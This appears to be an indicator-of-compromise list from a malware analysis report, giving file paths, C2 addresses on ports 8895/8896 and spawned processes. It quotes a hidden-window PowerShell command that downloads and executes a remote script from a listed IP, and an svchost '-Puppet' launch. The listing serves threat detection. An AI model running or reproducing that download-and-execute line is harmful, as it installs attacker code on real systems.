Technical Information
- http://222.186.141.207:8895/r29ktg9hza==
- %WINDIR%\syswow64\svchost.exe
- %ALLUSERSPROFILE%\ini\windows up.exe
- <Current directory>\psyqrdcd.dll
- '22#.#86.141.207':8896
- '22#.#86.141.207':8895
- http://22#.###.141.207:8895/R29kTG9hZA== via 22#.#86.141.207
- '22#.#86.141.207':8896
- '22#.#86.141.207':8895
- '%ALLUSERSPROFILE%\ini\windows up.exe'
- '%ALLUSERSPROFILE%\ini\windows up.exe' ' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://222.186.141.207:8895/R29kTG9hZA=='))"' (with hidden window)
- '%WINDIR%\syswow64\svchost.exe' -Puppet' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://222.186.141.207:8895/R29kTG9hZA=='))"
- '%WINDIR%\syswow64\svchost.exe' -Puppet